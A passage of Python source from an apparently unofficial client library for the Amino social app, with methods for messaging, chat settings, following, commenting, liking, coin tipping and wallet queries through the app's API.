- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Send a Message to a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If the Chat should Do Not Disturb or not.
- **pinChat** : If the Chat should Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"]["announcement"] = announcement
if pinAnnouncement: data["extensions"]["pinAnnouncement"] = pinAnnouncement
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
if viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
def visit(self, userId: str):
"""
Visit an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = self.session.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def follow(self, userId: [str, list]):
"""
Follow an User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unfollow(self, userId: str):
"""
Unfollow an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def block(self, userId: str):
"""
Block an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unblock(self, userId: str):
"""
Unblock an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = self.session.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = self.session.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"]["style"]["backgroundColor"] = backgroundColor
if backgroundImage: data["extensions"]["style"]["backgroundMediaList"] = [[100, backgroundImage, None, None, None]]
if defaultBubbleId: data["extensions"]["defaultBubbleId"] = defaultBubbleId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_blog(self, blogId: [str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
response = self.session.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from an Device ID.
**Parameters**
- **deviceID** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- ``https://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectID** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
